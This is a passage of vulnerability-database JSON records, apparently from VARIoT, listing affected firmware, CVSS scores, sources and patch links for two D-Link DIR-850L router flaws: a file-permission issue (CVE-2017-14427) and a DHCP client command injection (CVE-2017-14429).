"id": "CNNVD-201709-568"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14427"
}
]
},
"cve": "CVE-2017-14427",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14427",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2017-31782",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-105148",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14427",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14427",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31782",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-568",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105148",
"trust": 0.1,
"value": "LOW"
},
{
"author": "VULMON",
"id": "CVE-2017-14427",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "VULHUB",
"id": "VHN-105148"
},
{
"db": "VULMON",
"id": "CVE-2017-14427"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/run/storage_account_root permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit the vulnerability to obtain a certificate",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "VULHUB",
"id": "VHN-105148"
},
{
"db": "VULMON",
"id": "CVE-2017-14427"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14427",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-568",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31782",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105148",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-14427",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "VULHUB",
"id": "VHN-105148"
},
{
"db": "VULMON",
"id": "CVE-2017-14427"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"id": "VAR-201709-0598",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "VULHUB",
"id": "VHN-105148"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
}
]
},
"last_update_date": "2023-12-18T12:19:33.273000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100048"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-276",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105148"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "NVD",
"id": "CVE-2017-14427"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14427"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14427"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/276.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "VULHUB",
"id": "VHN-105148"
},
{
"db": "VULMON",
"id": "CVE-2017-14427"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "VULHUB",
"id": "VHN-105148"
},
{
"db": "VULMON",
"id": "CVE-2017-14427"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105148"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14427"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"date": "2017-09-13T17:29:00.807000",
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105148"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14427"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"date": "2023-11-17T19:59:48.367000",
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-568"
}
],
"trust": 0.6
}
}
VAR-201709-0600
Vulnerability from variot - Updated: 2023-12-18 12:19The DHCP client on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allows unauthenticated remote code execution as root because /etc/services/INET/inet_ipv4.php mishandles shell metacharacters, affecting generated files such as WAN-1-udhcpc.sh. D-Link DIR-850L The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the DHCP client on the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous versions of firmware using FW114WWb07_h2ab_beta1 and previous firmware. The vulnerability is due to the /etc/services/INET/inet_ipv4.php file. Handle shell metacharacters correctly. A remote attacker could exploit the vulnerability to execute code with root privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0600",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14429"
}
]
},
"cve": "CVE-2017-14429",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-14429",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-31797",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-105150",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14429",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14429",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2017-31797",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-566",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-105150",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-14429",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "VULHUB",
"id": "VHN-105150"
},
{
"db": "VULMON",
"id": "CVE-2017-14429"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DHCP client on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allows unauthenticated remote code execution as root because /etc/services/INET/inet_ipv4.php mishandles shell metacharacters, affecting generated files such as WAN-1-udhcpc.sh. D-Link DIR-850L The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the DHCP client on the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous versions of firmware using FW114WWb07_h2ab_beta1 and previous firmware. The vulnerability is due to the /etc/services/INET/inet_ipv4.php file. Handle shell metacharacters correctly. A remote attacker could exploit the vulnerability to execute code with root privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "VULHUB",
"id": "VHN-105150"
},
{
"db": "VULMON",
"id": "CVE-2017-14429"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14429",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31797",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105150",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-14429",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "VULHUB",
"id": "VHN-105150"
},
{
"db": "VULMON",
"id": "CVE-2017-14429"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"id": "VAR-201709-0600",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "VULHUB",
"id": "VHN-105150"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
}
]
},
"last_update_date": "2023-12-18T12:19:33.242000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B DHCP Repair measures for client security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100046"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105150"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "NVD",
"id": "CVE-2017-14429"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14429"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14429"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
